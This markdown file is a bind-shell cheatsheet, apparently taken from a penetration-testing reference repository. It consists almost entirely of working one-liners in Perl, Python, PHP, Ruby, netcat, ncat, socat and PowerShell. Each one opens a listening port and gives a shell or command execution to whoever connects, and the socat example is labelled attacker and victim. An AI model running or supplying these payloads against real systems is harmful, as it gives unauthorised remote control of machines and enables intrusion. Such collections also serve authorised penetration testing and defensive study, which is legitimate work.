shell-bind-cheatsheet.md (2730B)
1 --- 2 title: "Bind Shell" 3 section: "Cheatsheets" 4 sectionSlug: "cheatsheets" 5 sourcePath: "docs/cheatsheets/shell-bind-cheatsheet.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/cheatsheets/shell-bind-cheatsheet.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Bind Shell 12 13 ## Summary 14 15 * [Bind Shell](#bind-shell) 16 * [Perl](#perl) 17 * [Python](#python) 18 * [PHP](#php) 19 * [Ruby](#ruby) 20 * [Netcat Traditional](#netcat-traditional) 21 * [Netcat OpenBsd](#netcat-openbsd) 22 * [Ncat](#ncat) 23 * [Socat](#socat) 24 * [Powershell](#powershell) 25 26 ## Perl 27 28 ```perl 29 perl -e 'use Socket;$p=51337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));\ 30 bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);\ 31 close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");};' 32 ``` 33 34 ## Python 35 36 Single line : 37 38 ```python 39 python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",51337));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")' 40 ``` 41 42 Expanded version : 43 44 ```python 45 import socket as s,subprocess as sp; 46 47 s1 = s.socket(s.AF_INET, s.SOCK_STREAM); 48 s1.setsockopt(s.SOL_SOCKET, s.SO_REUSEADDR, 1); 49 s1.bind(("0.0.0.0", 51337)); 50 s1.listen(1); 51 c, a = s1.accept(); 52 53 while True: 54 d = c.recv(1024).decode(); 55 p = sp.Popen(d, shell=True, stdout=sp.PIPE, stderr=sp.PIPE, stdin=sp.PIPE); 56 c.sendall(p.stdout.read()+p.stderr.read()) 57 ``` 58 59 ## PHP 60 61 ```php 62 php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",51337);\ 63 socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,"$ ",2))exit;\ 64 $in=socket_read($cl,100);$cmd=popen("$in","r");while(!feof($cmd)){$m=fgetc($cmd);\ 65 socket_write($cl,$m,strlen($m));}}' 66 ``` 67 68 ## Ruby 69 70 ```ruby 71 ruby -rsocket -e 'f=TCPServer.new(51337);s=f.accept;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",s,s,s)' 72 ``` 73 74 ## Netcat Traditional 75 76 ```powershell 77 nc -nlvp 51337 -e /bin/bash 78 ``` 79 80 ## Netcat OpenBsd 81 82 ```powershell 83 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 51337 >/tmp/f 84 ``` 85 86 ## Ncat 87 88 ```powershell 89 ncat -nlvp 51337 -e /bin/bash 90 ``` 91 92 ## Socat 93 94 ```powershell 95 user@attacker$ socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 96 user@victim$ socat TCP-LISTEN:12345,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane 97 ``` 98 99 ## Powershell 100 101 ```powershell 102 https://github.com/besimorhino/powercat 103 104 # Victim (listen) 105 . .\powercat.ps1 106 powercat -l -p 7002 -ep 107 108 # Connect from attacker 109 . .\powercat.ps1 110 powercat -c 127.0.0.1 -p 7002 111 ```